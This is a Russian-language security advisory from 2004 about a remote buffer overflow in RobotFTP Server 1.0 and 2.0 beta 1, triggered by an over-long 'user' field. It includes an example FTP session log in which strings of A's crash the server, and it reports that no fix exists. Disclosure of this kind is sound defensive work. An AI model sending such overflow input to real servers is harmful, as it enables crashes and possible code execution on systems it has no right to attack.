Дата публикации: | 19.02.2004 |
Всего просмотров: | 1230 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | RobotFTP Server 1.x |
Уязвимые версии: RobotFTP Server 1.0, 2.0 beta 1
Описание: Переполнение буфера обнаружено в RobotFTP сервере. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь может представить специально обработанный текст для поля 'user', чтобы вызвать переполнение буфера и выполнить произвольный код с привилегиями FTP сервера. Пример/Эксплоит: 220 Connected to RobotFTP Server Benutzer (done:(none)): <AA...more than 47 A's...AA> 331 User name OK, send password as PASS Kennwort: 530 User cannot log in Anmeldung fehlgeschlagen. ftp> Ung ltiger Befehl ftp> user <AA... about 2000 A's ...AA> 550 Access is denied 550 Access is denied 550 Access is denied 550 Access is denied 550 Access is denied 550 Access is denied 550 Access is denied 502 Command not implemented Anmeldung fehlgeschlagen. ftp> Ung ltiger Befehl CRASH!!!!!! ftp> quit C:\Dokumente und Einstellungen\Admin\Desktop> URL производителя:http://www.robotftp.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | buffer overflow in Robot FTP Server |